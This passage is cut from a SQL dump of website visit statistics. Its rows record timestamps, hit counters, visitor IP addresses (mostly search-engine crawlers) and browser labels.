0,1,0,'66.249.76.29',''),(107353,1494117567,1,0,1,0,'66.249.76.108',''),(107354,1494117628,1,0,1,0,'66.249.76.28',''),(107355,1494117969,1,1,0,0,'51.255.65.76','other'),(107356,1494118380,2,2,0,0,'207.46.13.93','other'),(107357,1494118395,1,1,0,0,'207.46.13.102','other'),(107358,1494119191,1,0,1,0,'66.249.76.29',''),(107359,1494119363,1,0,1,0,'68.180.228.49',''),(107360,1494119527,1,0,1,0,'66.249.66.87',''),(107361,1494120343,1,1,0,0,'51.255.65.9','other'),(107362,1494120518,1,1,0,0,'217.182.132.88','other'),(107363,1494120760,1,1,0,0,'66.249.76.28','chrome'),(107364,1494121443,1,1,0,0,'217.182.132.34','other'),(107365,1494121731,1,1,0,0,'164.132.161.74','other'),(107366,1494121817,1,1,0,0,'217.182.132.19','other'),(107367,1494123325,1,1,0,0,'8.29.198.27','other'),(107368,1494123820,1,1,0,0,'137.74.201.100','other'),(107369,1494123859,1,0,1,0,'66.249.76.29',''),(107370,1494124025,1,1,0,0,'164.132.161.19','other'),(107371,1494124100,1,0,1,0,'66.249.66.177',''),(107372,1494124180,1,1,0,0,'217.182.132.25','other'),(107373,1494124541,1,1,0,0,'164.132.161.75','other'),(107374,1494125097,1,1,0,0,'51.255.65.94','other'),(107375,1494125237,1,1,0,0,'164.132.161.64','other'),(107376,1494125597,1,1,0,0,'217.182.132.183','other'),(107377,1494126220,1,1,0,0,'51.255.65.83','other'),(107378,1494126726,1,0,1,0,'66.249.76.28',''),(107379,1494126861,1,0,1,0,'66.249.76.29',''),(107380,1494126971,1,1,0,0,'217.182.132.75','other'),(107381,1494127314,1,1,0,0,'164.132.161.20','other'),(107382,1494127371,1,1,0,0,'164.132.161.37','other'),(107383,1494127703,1,1,0,0,'40.77.167.34','other'),(107384,1494128822,1,0,1,0,'66.249.76.108',''),(107385,1494128869,1,1,0,0,'164.132.161.9','other'),(107386,1494128871,1,1,0,0,'51.255.65.25','other'),(107387,1494129175,1,1,0,0,'151.80.27.116','other'),(107388,1494129381,1,1,0,0,'164.132.161.40','other'),(107389,1494129816,1,1,0,0,'217.182.132.78','other'),(107390,1494130197,1,1,0,0,'164.132.161.33','other'),(107391,1494130692,1,1,0,0,'217.182.132.25','other'),(107392,1494130975,1,1,0,0,'164.132.161.94','other'),(107393,1494131052,1,1,0,0,'217.182.132.77','other'),(107394,1494131087,1,1,0,0,'207.46.13.102','other'),(107395,1494131225,1,1,0,0,'217.182.132.185','other'),(107396,1494131509,1,1,0,0,'216.244.66.237','other'),(107397,1494131555,1,1,0,0,'164.132.161.40','other'),(107398,1494131602,1,1,0,0,'180.76.15.138','other'),(107399,1494131890,1,1,0,0,'137.74.207.120','other'),(107400,1494132260,1,0,1,0,'66.249.76.27',''),(107401,1494132350,1,0,1,0,'66.249.76.29',''),(107402,1494132654,1,1,0,0,'217.182.132.182','other'),(107403,1494133015,1,1,0,0,'217.182.132.183','other'),(107404,1494133497,1,1,0,0,'164.132.161.23','other'),(107405,1494133621,1,1,0,0,'51.255.71.133','other'),(107406,1494133659,1,1,0,0,'91.196.178.135','chrome'),(107407,1494133705,1,1,0,0,'164.132.161.77','other'),(107408,1494133985,1,1,0,0,'164.132.164.180','other'),(107409,1494134154,1,1,0,0,'8.29.198.27','other'),(107410,1494134247,1,1,0,0,'51.255.71.114','other'),(107411,1494134439,1,1,0,0,'217.182.132.146','other'),(107412,1494134441,1,1,0,0,'51.255.71.128','other'),(107413,1494134804,1,0,1,0,'66.249.76.27',''),(107414,1494134978,1,1,0,0,'51.255.65.224','other'),(107415,1494135247,1,0,1,0,'40.77.167.34',''),(107416,1494135580,1,1,0,0,'217.182.132.94','other'),(107417,1494136637,1,1,0,0,'40.77.167.34','other'),(107418,1494136638,1,1,0,0,'157.55.39.90','other'),(107419,1494137404,1,1,0,0,'164.132.161.19','other'),(107420,1494137475,1,1,0,0,'5.9.79.151','other'),(107421,1494137567,1,1,0,0,'164.132.161.32','other'),(107422,1494137667,1,1,0,0,'217.182.132.68','other'),(107423,1494137750,1,0,1,0,'66.249.76.29',''),(107424,1494137759,1,1,0,0,'217.182.132.28','other'),(107425,1494137823,1,1,0,0,'217.182.132.240','other'),(107426,1494137919,1,1,0,0,'51.255.65.11','other'),(107427,1494137929,1,0,1,0,'66.249.76.108',''),(107428,1494138034,1,1,0,0,'164.132.161.58','other'),(107429,1494138077,1,1,0,0,'164.132.161.40','other'),(107430,1494138402,1,1,0,0,'157.55.39.90','other'),(107431,1494138791,1,1,0,0,'217.182.132.20','other'),(107432,1494139465,1,1,0,0,'51.255.65.9','other'),(107433,1494139480,1,1,0,0,'51.255.65.7','other'),(107434,1494139534,1,1,0,0,'217.182.132.55','other'),(107435,1494139542,1,0,1,0,'66.249.66.84',''),(107436,1494139553,1,1,0,0,'51.255.71.100','other'),(107437,1494139733,1,0,1,0,'66.249.66.87',''),(107438,1494140074,1,1,0,0,'164.132.161.41','other'),(107439,1494140566,1,1,0,0,'164.132.161.64','other'),(107440,1494140575,1,1,0,0,'66.102.9.29','chrome'),(107441,1494140768,1,1,0,0,'217.182.132.146','other'),(107442,1494140786,1,1,0,0,'162.210.196.98','other'),(107443,1494140907,1,1,0,0,'51.255.65.84','other'),(107444,1494141608,1,1,0,0,'217.182.132.17','other'),(107445,1494141619,1,1,0,0,'207.46.13.93','other'),(107446,1494141816,1,0,1,0,'66.249.76.28',''),(107447,1494141936,1,1,0,0,'137.74.207.114','other'),(107448,1494141939,1,1,0,0,'178.94.172.161','chrome'),(107449,1494143045,1,1,0,0,'164.132.161.10','other'),(107450,1494143112,1,1,0,0,'164.132.161.9','other'),(107451,1494143129,1,1,0,0,'164.132.161.82','other'),(107452,1494143247,1,1,0,0,'51.255.71.133','other'),(107453,1494143528,1,0,1,0,'66.249.66.84',''),(107454,1494144244,1,1,0,0,'164.132.161.5','other'),(107455,1494144270,2,2,0,0,'164.132.161.77','other'),(107456,1494144356,1,1,0,0,'5.189.150.231','other'),(107457,1494144737,1,1,0,0,'217.182.132.33','other'),(107458,1494144985,1,1,0,0,'8.29.198.25','other'),(107459,1494144986,1,1,0,0,'51.255.65.13','other'),(107460,1494145239,1,0,1,0,'66.249.76.108',''),(107461,1494145546,1,1,0,0,'51.255.65.26','other'),(107462,1494145635,1,1,0,0,'217.182.132.29','other'),(107463,1494145820,1,0,1,0,'68.180.231.24',''),(107464,1494145872,1,1,0,0,'164.132.161.77','other'),(107465,1494146048,1,1,0,0,'51.255.65.46','other'),(107466,1494146109,1,1,0,0,'164.132.161.50','other'),(107467,1494146330,1,1,0,0,'217.182.132.172','other'),(107468,1494146474,1,1,0,0,'217.182.132.57','other'),(107469,1494146874,1,1,0,0,'217.182.132.157','other'),(107470,1494147358,1,1,0,0,'51.255.65.56','other'),(107471,1494147530,1,1,0,0,'51.255.65.50','other'),(107472,1494148094,1,1,0,0,'157.55.39.90','other'),(107473,1494148186,1,1,0,0,'164.132.161.20','other'),(107474,1494148467,1,1,0,0,'217.182.132.27','other'),(107475,1494148797,1,1,0,0,'40.77.167.34','other'),(107476,1494148917,1,1,0,0,'164.132.162.158','other'),(107477,1494149469,1,1,0,0,'217.182.132.95','other'),(107478,1494149524,1,1,0,0,'164.132.161.32','other'),(107479,1494149597,1,1,0,0,'207.46.13.93','other'),(107480,1494149633,1,1,0,0,'217.182.132.193','other'),(107481,1494149647,1,1,0,0,'164.132.161.66','other'),(107482,1494149717,1,1,0,0,'91.196.178.40','firefox'),(107483,1494149995,2,2,0,0,'51.255.65.88','other'),(107484,1494150094,1,1,0,0,'51.255.65.224','other'),(107485,1494150198,1,1,0,0,'141.8.142.152','other'),(107486,1494150200,1,1,0,0,'5.255.253.34','other'),(107487,1494151055,1,1,0,0,'164.132.162.156','other'),(107488,1494151338,1,1,0,0,'51.255.65.81','other'),(107489,1494151390,1,1,0,0,'51.255.65.65','other'),(107490,1494151402,1,1,0,0,'51.255.71.110','other'),(107491,1494151638,1,1,0,0,'95.108.179.12','other'),(107492,1494151759,1,1,0,0,'216.244.66.237','other'),(107493,1494152300,1,1,0,0,'217.182.132.37','other'),(107494,1494152533,1,0,1,0,'66.249.66.84',''),(107495,1494152660,1,1,0,0,'51.255.71.111','other'),(107496,1494152665,1,1,0,0,'217.182.132.76','other'),(107497,1494152668,1,1,0,0,'217.182.132.80','other'),(107498,1494152848,1,1,0,0,'91.196.178.166','other'),(107499,1494153047,1,1,0,0,'217.182.132.70','other'),(107500,1494153168,1,1,0,0,'164.132.161.29','other'),(107501,1494153340,1,1,0,0,'217.182.132.6','other'),(107502,1494153632,1,0,1,0,'68.180.231.24',''),(107503,1494153640,1,1,0,0,'51.255.65.95','other'),(107504,1494153735,1,1,0,0,'37.9.113.16','other'),(107505,1494153788,1,1,0,0,'51.255.65.74','other'),(107506,1494153882,1,1,0,0,'54.165.59.7','other'),(107507,1494153898,1,1,0,0,'164.132.161.14','other'),(107508,1494153980,1,0,1,0,'66.249.76.46',''),(107509,1494154296,1,1,0,0,'157.55.39.90','other'),(107510,1494154591,1,1,0,0,'217.182.132.97','other'),(107511,1494154773,1,1,0,0,'164.132.161.70','other'),(107512,1494155392,1,1,0,0,'217.182.132.186','other'),(107513,1494155778,1,1,0,0,'217.182.132.176','other'),(107514,1494155814,1,1,0,0,'8.29.198.25','other'),(107515,1494155830,1,1,0,0,'141.8.142.39','other'),(107516,1494156087,1,1,0,0,'217.182.132.173','other'),(107517,1494156309,1,1,0,0,'51.255.71.133','other'),(107518,1494156722,1,1,0,0,'164.132.161.23','other'),(107519,1494156727,1,0,1,0,'66.249.76.46',''),(107520,1494157351,1,1,0,0,'178.64.193.57','firefox'),(107521,1494157531,1,1,0,0,'217.182.132.75','other'),(107522,1494157716,1,1,0,0,'178.154.189.10','other'),(107523,1494157732,1,1,0,0,'51.255.65.90','other'),(107524,1494158248,1,1,0,0,'51.255.65.57','other'),(107525,1494158879,1,0,1,0,'40.77.167.34',''),(107526,1494159086,1,1,0,0,'51.255.65.70','other'),(107527,1494159140,1,1,0,0,'51.255.65.71','other'),(107528,1494159345,4,4,0,0,'5.255.253.34','other'),(107529,1494159349,1,1,0,0,'178.154.189.24','other'),(107530,1494159356,4,4,0,0,'5.255.253.27','other'),(107531,1494159360,3,3,0,0,'178.154.149.7','other'),(107532,1494159363,2,2,0,0,'141.8.142.51','other'),(107533,1494159367,4,4,0,0,'5.255.253.54','other'),(107534,1494159371,2,2,0,0,'37.9.113.11','other'),(107535,1494159374,3,3,0,0,'141.8.142.170','other'),(107536,1494159378,2,2,0,0,'5.255.253.16','other'),(107537,1494159381,3,3,0,0,'178.154.189.10','other'),(107538,1494159388,3,3,0,0,'141.8.142.134','other'),(107539,1494159392,1,1,0,0,'5.255.253.66','other'),(107540,1494159395,1,1,0,0,'141.8.142.144','other'),(107541,1494159399,1,1,0,0,'5.255.253.23','other'),(107542,1494159405,2,2,0,0,'5.255.253.75','other'),(107543,1494159412,4,4,0,0,'5.255.253.37','other'),(107544,1494159415,3,3,0,0,'95.108.179.17','other'),(107545,1494159422,4,4,0,0,'95.108.179.12','other'),(107546,1494159432,2,2,0,0,'95.108.179.14','other'),(107547,1494159441,2,2,0,0,'141.8.142.70','other'),(107548,1494159447,2,2,0,0,'37.9.113.15','other'),(107549,1494159451,1,1,0,0,'141.8.142.74','other'),(107550,1494159465,1,1,0,0,'5.255.253.48','other'),(107551,1494159486,1,1,0,0,'37.9.113.16','other'),(107552,1494159497,3,3,0,0,'141.8.142.142','other'),(107553,1494159500,2,2,0,0,'141.8.142.50','other'),(107554,1494159513,1,1,0,0,'5.255.253.33','other'),(107555,1494159536,1,0,1,0,'68.180.231.24',''),(107556,1494159548,1,1,0,0,'5.255.253.11','other'),(107557,1494159551,1,1,0,0,'141.8.142.152','other'),(107558,1494160291,1,1,0,0,'51.255.65.20','other'),(107559,1494160366,1,1,0,0,'217.182.132.87','other'),(107560,1494160715,1,1,0,0,'51.255.65.70','other'),(107561,1494160858,1,1,0,0,'164.132.161.27','other'),(107562,1494161431,1,1,0,0,'5.255.253.66','other'),(107563,1494161520,1,1,0,0,'51.255.71.121','other'),(107564,1494161639,1,1,0,0,'164.132.161.9','other'),(107565,1494162527,1,1,0,0,'207.46.13.102','other'),(107566,1494162941,1,1,0,0,'217.182.132.94','other'),(107567,1494162944,1,1,0,0,'5.165.240.246','msie'),(107568,1494162977,1,1,0,0,'51.255.65.71','other'),(107569,1494163358,2,2,0,0,'217.182.132.240','other'),(107570,1494163521,1,1,0,0,'5.255.253.66','other'),(107571,1494163664,1,1,0,0,'51.255.65.49','other'),(107572,1494163862,1,1,0,0,'164.132.161.76','other'),(107573,1494164217,1,1,0,0,'37.9.113.15','other'),(107574,1494164630,1,1,0,0,'137.74.207.102','other'),(107575,1494164787,1,1,0,0,'5.255.253.37','other'),(107576,1494165062,1,1,0,0,'137.74.207.170','other'),(107577,1494165083,1,1,0,0,'82.145.221.195','other'),(107578,1494165275,1,1,0,0,'137.74.207.116','other'),(107579,1494165809,1,0,1,0,'66.249.76.107',''),(107580,1494166045,1,1,0,0,'141.8.142.74','other'),(107581,1494166309,1,1,0,0,'40.77.167.34','other'),(107582,1494166450,1,0,1,0,'66.249.66.177',''),(107583,1494166482,1,1,0,0,'217.182.132.155','other'),(107584,1494166641,1,1,0,0,'8.29.198.26','other'),(107585,1494166721,1,1,0,0,'164.132.161.75','other'),(107586,1494167024,1,1,0,0,'51.255.65.97','other'),(107587,1494167092,1,1,0,0,'217.182.132.28','other'),(107588,1494167158,1,1,0,0,'217.182.132.96','other'),(107589,1494167182,2,2,0,0,'51.255.65.21','other'),(107590,1494167786,1,1,0,0,'217.182.132.173','other'),(107591,1494167913,1,1,0,0,'137.74.207.116','other'),(107592,1494168183,1,1,0,0,'51.255.65.86','other'),(107593,1494168421,1,0,1,0,'66.249.76.107',''),(107594,1494168434,1,1,0,0,'141.8.142.170','other'),(107595,1494169138,1,1,0,0,'164.132.161.80','other'),(107596,1494169850,1,1,0,0,'51.255.65.52','other'),(107597,1494170168,1,1,0,0,'137.74.207.159','other'),(107598,1494170417,1,1,0,0,'51.255.65.12','other'),(107599,1494170498,1,1,0,0,'141.8.142.51','other'),(107600,1494170618,1,1,0,0,'217.69.136.208','other'),(107601,1494171016,1,1,0,0,'164.132.161.61','other'),(107602,1494171094,1,1,0,0,'217.182.132.157','other'),(107603,1494171219,1,1,0,0,'137.74.207.101','other'),(107604,1494171405,1,1,0,0,'164.132.161.70','other'),(107605,1494171446,1,1,0,0,'137.74.203.194','other'),(107606,1494171978,1,1,0,0,'51.255.65.82','other'),(107607,1494172353,1,1,0,0,'51.255.65.97','other'),(107608,1494172600,1,1,0,0,'5.255.253.16','other'),(107609,1494172686,1,1,0,0,'217.182.132.183','other'),(107610,1494172800,1,1,0,0,'217.182.132.188','other'),(107611,1494173032,1,1,0,0,'91.196.178.133','chrome'),(107612,1494173429,1,1,0,0,'46.42.160.249','msie'),(107613,1494173433,1,1,0,0,'37.112.228.226','msie'),(107614,1494173612,1,1,0,0,'164.132.162.156','other'),(107615,1494174677,1,1,0,0,'217.69.136.206','other'),(107616,1494174696,1,1,0,0,'141.8.142.142','other'),(107617,1494174751,1,1,0,0,'51.255.71.130','other'),(107618,1494174827,1,1,0,0,'51.255.71.133','other'),(107619,1494175164,1,1,0,0,'51.255.65.35','other'),(107620,1494176035,1,1,0,0,'217.182.132.96','other'),(107621,1494176966,1,1,0,0,'164.132.161.13','other'),(107622,1494177036,1,1,0,0,'217.182.132.71','other'),(107623,1494177461,1,1,0,0,'8.29.198.27','other'),(107624,1494177502,1,1,0,0,'141.8.142.74','other'),(107625,1494177632,1,1,0,0,'164.132.161.63','other'),(107626,1494178090,1,0,1,0,'66.249.76.109',''),(107627,1494178331,2,2,0,0,'217.182.132.183','other'),(107628,1494178641,1,1,0,0,'51.255.71.115','other'),(107629,1494178862,1,1,0,0,'78.111.185.45','chrome'),(107630,1494179275,1,1,0,0,'164.132.161.83','other'),(107631,1494180194,1,1,0,0,'180.76.15.163','other'),(107632,1494180294,1,1,0,0,'141.8.142.134','other'),(107633,1494180590,1,1,0,0,'217.69.133.15','other'),(107634,1494180639,1,1,0,0,'164.132.161.22','other'),(107635,1494180797,1,1,0,0,'217.182.132.68','other'),(107636,1494180875,1,1,0,0,'217.182.132.149','other'),(107637,1494181799,1,1,0,0,'164.132.161.30','other'),(107638,1494182247,1,1,0,0,'137.74.201.100','other'),(107639,1494182255,1,1,0,0,'51.255.65.12','other'),(107640,1494182472,2,0,2,0,'66.249.76.45',''),(107641,1494182655,1,1,0,0,'51.255.65.27','other'),(107642,1494182971,1,1,0,0,'51.255.71.98','other'),(107643,1494183093,1,1,0,0,'5.255.253.66','other'),(107644,1494183244,1,1,0,0,'51.255.71.123','other'),(107645,1494183400,1,1,0,0,'217.182.132.97','other'),(107646,1494183551,1,1,0,0,'66.249.76.45','chrome'),(107647,1494183726,1,1,0,0,'164.132.161.91','other'),(107648,1494183781,1,1,0,0,'51.255.65.27','other'),(107649,1494183909,1,1,0,0,'217.182.132.53','other'),(107650,1494184155,1,1,0,0,'217.182.132.154','other'),(107651,1494184374,1,1,0,0,'217.69.133.243','other'),(107652,1494184542,1,1,0,0,'217.182.132.191','other'),(107653,1494184546,1,1,0,0,'51.255.65.22','other'),(107654,1494185883,1,1,0,0,'5.255.253.23','other'),(107655,1494185917,1,1,0,0,'40.77.167.34','other'),(107656,1494185998,1,0,1,0,'66.249.76.108',''),(107657,1494186445,1,1,0,0,'164.132.161.95','other'),(107658,1494186548,1,1,0,0,'164.132.161.13','other'),(107659,1494186799,1,1,0,0,'51.255.65.75','other'),(107660,1494186909,1,1,0,0,'164.132.161.76','other'),(107661,1494187192,1,1,0,0,'216.244.66.237','other'),(107662,1494187203,1,0,1,0,'66.249.76.108',''),(107663,1494187299,1,1,0,0,'51.255.65.41','other'),(107664,1494187319,1,1,0,0,'164.132.161.21','other'),(107665,1494187412,1,1,0,0,'164.132.161.38','other'),(107666,1494187962,1,0,1,0,'68.180.228.49',''),(107667,1494188238,1,1,0,0,'164.132.161.50','other'),(107668,1494188294,1,1,0,0,'8.29.198.26','other'),(107669,1494188438,1,1,0,0,'51.255.65.80','other'),(107670,1494188684,1,1,0,0,'141.8.142.70','other'),(107671,1494188750,1,1,0,0,'217.182.132.23','other'),(107672,1494188757,1,1,0,0,'51.255.71.112','other'),(107673,1494189286,1,1,0,0,'164.132.161.21','other'),(107674,1494189792,1,0,1,0,'157.55.39.90',''),(107675,1494189837,1,1,0,0,'164.132.161.49','other'),(107676,1494190160,1,1,0,0,'51.255.65.36','other'),(107677,1494190181,1,1,0,0,'51.255.65.34','other'),(107678,1494190349,1,1,0,0,'95.108.179.17','other'),(107679,1494190352,1,0,1,0,'68.180.231.24',''),(107680,1494190353,1,1,0,0,'5.255.253.23','other'),(107681,1494190357,1,1,0,0,'5.255.253.16','other'),(107682,1494190361,1,1,0,0,'141.8.142.170','other'),(107683,1494190997,1,1,0,0,'51.255.65.33','other'),(107684,1494191183,1,1,0,0,'51.255.65.7','other'),(107685,1494191202,1,1,0,0,'217.182.132.4','other'),(107686,1494191340,1,1,0,0,'51.255.71.116','other'),(107687,1494191670,1,1,0,0,'217.182.132.170','other'),(107688,1494191890,1,1,0,0,'217.182.132.80','other'),(107689,1494192157,1,1,0,0,'95.108.179.12','other'),(107690,1494192776,1,1,0,0,'164.132.161.20','other'),(107691,1494192791,1,1,0,0,'164.132.161.56','other'),(107692,1494193401,1,1,0,0,'137.74.207.116','other'),(107693,1494193670,1,0,1,0,'66.249.76.46',''),(107694,1494193780,1,1,0,0,'51.255.65.30','other'),(107695,1494194023,1,0,1,0,'207.46.13.93',''),(107696,1494194251,1,1,0,0,'5.255.253.34','other'),(107697,1494194294,1,1,0,0,'5.255.253.16','other'),(107698,1494194298,1,1,0,0,'141.8.142.134','other'),(107699,1494194330,1,1,0,0,'217.182.132.62','other'),(107700,1494194552,1,0,1,0,'66.249.76.109',''),(107701,1494194704,1,0,1,0,'66.249.76.46',''),(107702,1494194990,1,1,0,0,'51.255.71.115','other'),(107703,1494195547,1,0,1,0,'66.249.66.81',''),(107704,1494195600,1,1,0,0,'51.255.65.33','other'),(107705,1494195651,1,1,0,0,'5.255.253.33','other'),(107706,1494195837,1,1,0,0,'51.255.65.48','other'),(107707,1494196501,1,1,0,0,'217.182.132.82','other'),(107708,1494197053,1,1,0,0,'5.255.253.23','other'),(107709,1494197262,1,1,0,0,'164.132.161.93','other'),(107710,1494197753,1,1,0,0,'141.8.142.70','other'),(107711,1494198230,1,1,0,0,'217.182.132.79','other'),(107712,1494198301,1,1,0,0,'164.132.161.77','other'),(107713,1494198450,1,1,0,0,'5.255.253.27','other'),(107714,1494198636,1,1,0,0,'164.132.162.160','other'),(107715,1494198637,1,1,0,0,'217.182.132.32','other'),(107716,1494198777,1,0,1,0,'207.46.13.102',''),(107717,1494199123,1,1,0,0,'8.29.198.27','other'),(107718,1494199149,1,1,0,0,'37.9.113.11','other'),(107719,1494199848,1,1,0,0,'5.255.253.27','other'),(107720,1494199897,1,1,0,0,'51.255.65.20','other'),(107721,1494200523,1,1,0,0,'51.255.65.39','other'),(107722,1494200548,1,1,0,0,'95.108.179.12','other'),(107723,1494201135,1,1,0,0,'164.132.162.188','other'),(107724,1494201431,1,1,0,0,'164.132.161.88','other'),(107725,1494202008,2,2,0,0,'95.213.141.126','opera'),(107726,1494202026,1,0,1,0,'68.180.231.24',''),(107727,1494202538,1,1,0,0,'51.255.65.20','other'),(107728,1494202692,1,0,1,0,'66.249.76.45',''),(107729,1494202884,1,1,0,0,'164.132.161.2','other'),(107730,1494203463,1,1,0,0,'164.132.162.155','other'),(107731,1494204045,1,1,0,0,'93.158.152.14','other'),(107732,1494204301,1,1,0,0,'217.182.132.50','other'),(107733,1494204411,1,1,0,0,'217.182.132.185','other'),(107734,1494204495,1,0,1,0,'66.249.76.46',''),(107735,1494204537,1,1,0,0,'51.255.65.21','other'),(107736,1494204645,1,1,0,0,'51.255.65.77','other'),(107737,1494204745,1,1,0,0,'141.8.142.134','other'),(107738,1494204806,1,1,0,0,'164.132.161.82','other'),(107739,1494204823,1,1,0,0,'164.132.161.56','other'),(107740,1494204907,1,1,0,0,'164.132.161.52','other'),(107741,1494205053,1,1,0,0,'164.132.161.53','other'),(107742,1494205628,1,1,0,0,'164.132.164.180','other'),(107743,1494206171,1,1,0,0,'164.132.161.72','other'),(107744,1494206760,1,0,1,0,'66.249.76.109',''),(107745,1494207339,1,1,0,0,'51.255.65.51','other'),(107746,1494208212,1,0,1,0,'66.249.66.177',''),(107747,1494208231,1,1,0,0,'51.255.65.41','other'),(107748,1494208239,1,1,0,0,'178.154.189.24','other'),(107749,1494208350,1,1,0,0,'164.132.161.78','other'),(107750,1494208517,1,0,1,0,'66.249.76.108',''),(107751,1494209119,1,1,0,0,'217.182.132.171','other'),(107752,1494209157,1,1,0,0,'164.132.161.61','other'),(107753,1494209833,1,1,0,0,'164.132.161.77','other'),(107754,1494209889,1,1,0,0,'66.102.9.27','chrome'),(107755,1494209929,1,1,0,0,'217.182.132.79','other'),(107756,1494209936,1,1,0,0,'51.255.71.129','other'),(107757,1494209958,1,1,0,0,'8.29.198.25','other'),(107758,1494210134,1,1,0,0,'217.182.132.64','other'),(107759,1494211118,1,1,0,0,'217.182.132.22','other'),(107760,1494211298,1,1,0,0,'180.76.15.140','other'),(107761,1494211299,1,1,0,0,'180.76.15.155','other'),(107762,1494211368,1,1,0,0,'217.182.132.187','other'),(107763,1494211729,1,1,0,0,'37.9.113.16','other'),(107764,1494211774,1,1,0,0,'137.74.207.161','other'),(107765,1494212157,2,0,2,0,'66.249.76.45',''),(107766,1494212595,1,1,0,0,'217.182.132.24','other'),(107767,1494212641,1,0,1,0,'66.249.76.47',''),(107768,1494213007,1,1,0,0,'51.255.71.113','other'),(107769,1494213700,1,1,0,0,'51.255.65.69','other'),(107770,1494213862,1,1,0,0,'217.182.132.52','other'),(107771,1494214197,1,1,0,0,'164.132.161.31','other'),(107772,1494214749,1,0,1,0,'207.46.13.102',''),(107773,1494214915,1,1,0,0,'217.182.132.71','other'),(107774,1494215217,1,1,0,0,'37.9.113.16','other'),(107775,1494215262,1,1,0,0,'141.8.142.176','other'),(107776,1494215265,1,1,0,0,'5.255.253.34','other'),(107777,1494215268,1,1,0,0,'141.8.142.152','other'),(107778,1494215529,1,1,0,0,'217.182.132.94','other'),(107779,1494215779,1,1,0,0,'82.145.222.192','other'),(107780,1494216025,1,1,0,0,'66.249.76.107','chrome'),(107781,1494216065,1,0,1,0,'66.249.76.45',''),(107782,1494216509,1,1,0,0,'217.182.132.149','other'),(107783,1494216812,1,1,0,0,'217.182.132.56','other'),(107784,1494216976,1,1,0,0,'217.182.132.35','other'),(107785,1494218076,1,1,0,0,'51.255.65.5','other'),(107786,1494218680,1,1,0,0,'51.255.71.129','other'),(107787,1494218706,1,1,0,0,'93.158.152.71','other'),(107788,1494218836,1,0,1,0,'68.180.231.24',''),(107789,1494218982,1,1,0,0,'217.182.132.57','other'),(107790,1494219468,1,1,0,0,'164.132.161.56','other'),(107791,1494219629,1,0,1,0,'66.249.66.81',''),(107792,1494219961,1,1,0,0,'164.132.161.89','other'),(107793,1494220493,2,0,2,0,'66.249.76.46',''),(107794,1494220549,1,1,0,0,'51.255.65.64','other'),(107795,1494220625,1,1,0,0,'51.255.65.30','other'),(107796,1494220786,1,1,0,0,'8.29.198.25','other'),(107797,1494220853,1,1,0,0,'217.182.132.37','other'),(107798,1494220956,1,1,0,0,'51.255.65.23','other'),(107799,1494221934,1,1,0,0,'178.154.189.10','other'),(107800,1494222689,1,1,0,0,'51.255.71.113','other'),(107801,1494222714,1,1,0,0,'217.182.132.88','other'),(107802,1494222715,1,1,0,0,'51.255.65.83','other'),(107803,1494222758,1,1,0,0,'51.255.65.58','other'),(107804,1494222893,1,1,0,0,'216.244.66.237','other'),(107805,1494223034,1,0,1,0,'157.55.39.90',''),(107806,1494223086,1,0,1,0,'66.249.66.87',''),(107807,1494223484,1,1,0,0,'217.182.132.62','other'),(107808,1494225132,1,1,0,0,'217.182.132.193','other'),(107809,1494225321,1,1,0,0,'180.76.15.19','other'),(107810,1494225418,1,0,1,0,'66.249.76.109',''),(107811,1494225426,1,1,0,0,'5.255.253.34','other'),(107812,1494225430,1,1,0,0,'5.255.253.75','other'),(107813,1494226190,1,1,0,0,'164.132.161.46','other'),(107814,1494226710,1,1,0,0,'217.182.132.192','other'),(107815,1494226941,1,1,0,0,'164.132.162.156','other'),(107816,1494227064,1,0,1,0,'66.249.76.47',''),(107817,1494227069,1,0,1,0,'66.249.66.81',''),(107818,1494227571,1,0,1,0,'66.249.76.108',''),(107819,1494227717,1,1,0,0,'137.74.207.102','other'),(107820,1494227738,1,0,1,0,'66.249.76.107',''),(107821,1494227954,1,1,0,0,'91.196.178.130','firefox'),(107822,1494228091,1,1,0,0,'217.182.132.171','other'),(107823,1494228341,1,0,1,0,'68.180.231.24',''),(107824,1494228590,1,1,0,0,'93.171.243.107','chrome'),(107825,1494228676,1,1,0,0,'51.255.65.91','other'),(107826,1494229077,1,1,0,0,'207.46.13.93','other'),(107827,1494229644,1,1,0,0,'51.255.71.126','other'),(107828,1494229679,1,0,1,0,'66.249.76.109',''),(107829,1494229854,1,0,1,0,'66.249.76.45',''),(107830,1494229935,1,1,0,0,'137.74.207.108','other'),(107831,1494230623,1,1,0,0,'217.182.132.83','other'),(107832,1494230807,1,1,0,0,'40.77.167.34','other'),(107833,1494230983,1,1,0,0,'199.58.86.209','other'),(107834,1494231232,1,1,0,0,'164.132.161.49','other'),(107835,1494231613,1,1,0,0,'8.29.198.26','other'),(107836,1494231773,1,1,0,0,'5.255.253.54','other'),(107837,1494231903,1,1,0,0,'164.132.161.68','other'),(107838,1494232290,1,1,0,0,'164.132.161.28','other'),(107839,1494232628,1,0,1,0,'66.249.66.84',''),(107840,1494233207,1,0,1,0,'66.249.76.107',''),(107841,1494233329,1,0,1,0,'66.249.76.47',''),(107842,1494233339,1,0,1,0,'66.249.66.81',''),(107843,1494233425,1,1,0,0,'164.132.161.35','other'),(107844,1494233441,1,1,0,0,'180.76.15.136','other'),(107845,1494234012,1,1,0,0,'164.132.161.47','other'),(107846,1494234276,1,1,0,0,'217.182.132.64','other'),(107847,1494234736,1,1,0,0,'5.255.253.34','other'),(107848,1494234821,1,1,0,0,'94.178.6.16','chrome'),(107849,1494235369,1,1,0,0,'217.182.132.58','other'),(107850,1494235458,1,1,0,0,'51.255.65.5','other'),(107851,1494235829,1,1,0,0,'141.8.142.70','other'),(107852,1494235838,1,1,0,0,'51.255.65.54','other'),(107853,1494235845,1,1,0,0,'5.255.253.33','other'),(107854,1494235889,1,1,0,0,'141.8.142.51','other'),(107855,1494236068,1,0,1,0,'66.249.76.45',''),(107856,1494236678,1,1,0,0,'137.74.207.170','other'),(107857,1494236858,1,0,1,0,'40.77.167.34',''),(107858,1494236866,1,1,0,0,'164.132.161.40','other'),(107859,1494237279,1,1,0,0,'5.255.253.37','other'),(107860,1494237885,1,1,0,0,'51.255.65.95','other'),(107861,1494238238,1,1,0,0,'217.182.132.77','other'),(107862,1494238246,2,0,2,0,'68.180.231.24',''),(107863,1494238406,2,0,2,0,'66.249.76.45',''),(107864,1494238704,1,1,0,0,'91.196.178.134','chrome'),(107865,1494238706,1,1,0,0,'51.255.65.4','other'),(107866,1494238799,1,0,1,0,'66.249.76.107',''),(107867,1494239083,1,1,0,0,'51.255.71.113','other'),(107868,1494239117,1,1,0,0,'164.132.161.39','other'),(107869,1494239716,1,1,0,0,'95.132.20.137','chrome'),(107870,1494239818,1,1,0,0,'217.182.132.64','other'),(